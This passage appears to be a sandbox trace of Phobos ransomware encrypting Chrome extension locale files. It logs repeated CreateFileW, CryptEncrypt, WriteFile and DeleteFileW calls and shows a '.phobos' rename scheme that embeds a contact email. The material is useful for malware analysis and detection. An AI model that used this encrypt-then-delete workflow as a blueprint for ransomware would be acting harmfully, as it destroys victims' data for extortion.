halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0160.199] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.199] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.199] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0160.199] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0160.199] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.199] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xf9, lpOverlapped=0x0) returned 1 [0160.200] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x100, dwBufLen=0x100 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x100) returned 1 [0160.200] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x100, lpOverlapped=0x0) returned 1 [0160.201] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0160.201] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.201] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0160.201] CryptDestroyKey (hKey=0xa32da8) returned 1 [0160.201] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0160.201] CryptDestroyKey (hKey=0xa327e8) returned 1 [0160.201] CloseHandle (hObject=0x194) returned 1 [0160.201] CloseHandle (hObject=0x17c) returned 1 [0160.201] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json")) returned 1 [0160.202] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0160.202] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0160.337] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=236) returned 1 [0160.337] CloseHandle (hObject=0x134) returned 1 [0160.337] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json")) returned 0x2020 [0160.337] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0160.337] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0160.337] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.337] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.636] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0160.636] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0160.636] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.636] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xec, lpOverlapped=0x0) returned 1 [0160.637] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0160.637] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0160.638] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0160.638] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.638] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0160.638] CryptDestroyKey (hKey=0xa32da8) returned 1 [0160.638] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0160.638] CryptDestroyKey (hKey=0xa327e8) returned 1 [0160.638] CloseHandle (hObject=0x134) returned 1 [0160.638] CloseHandle (hObject=0x17c) returned 1 [0160.638] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json")) returned 1 [0160.639] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0160.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0160.669] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=269) returned 1 [0160.669] CloseHandle (hObject=0x134) returned 1 [0160.669] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json")) returned 0x2020 [0160.669] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0160.669] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0160.670] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.670] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.670] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0160.912] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0160.912] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.912] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x10d, lpOverlapped=0x0) returned 1 [0160.913] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110, dwBufLen=0x110 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110) returned 1 [0160.913] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x110, lpOverlapped=0x0) returned 1 [0160.914] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0160.914] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.914] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0160.914] CryptDestroyKey (hKey=0xa327e8) returned 1 [0160.914] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0160.914] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0160.914] CloseHandle (hObject=0x134) returned 1 [0160.914] CloseHandle (hObject=0x130) returned 1 [0160.914] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json")) returned 1 [0160.915] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0160.915] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0160.916] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=289) returned 1 [0160.916] CloseHandle (hObject=0x130) returned 1 [0160.916] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json")) returned 0x2020 [0160.916] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0160.916] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0160.916] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.916] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0160.917] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0160.917] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.917] ReadFile (in: hFile=0x130, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x121, lpOverlapped=0x0) returned 1 [0160.918] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x130, dwBufLen=0x130 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x130) returned 1 [0160.918] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x130, lpOverlapped=0x0) returned 1 [0160.919] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0160.919] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.919] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0160.919] CryptDestroyKey (hKey=0xa327e8) returned 1 [0160.919] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0160.920] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0160.920] CloseHandle (hObject=0x130) returned 1 [0160.920] CloseHandle (hObject=0x134) returned 1 [0160.920] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json")) returned 1 [0160.921] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0160.921] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0160.922] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=230) returned 1 [0160.922] CloseHandle (hObject=0x134) returned 1 [0160.922] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json")) returned 0x2020 [0160.922] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0160.922] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0160.922] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.922] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.922] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0160.923] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0160.923] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.923] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xe6, lpOverlapped=0x0) returned 1 [0160.923] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0160.924] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: 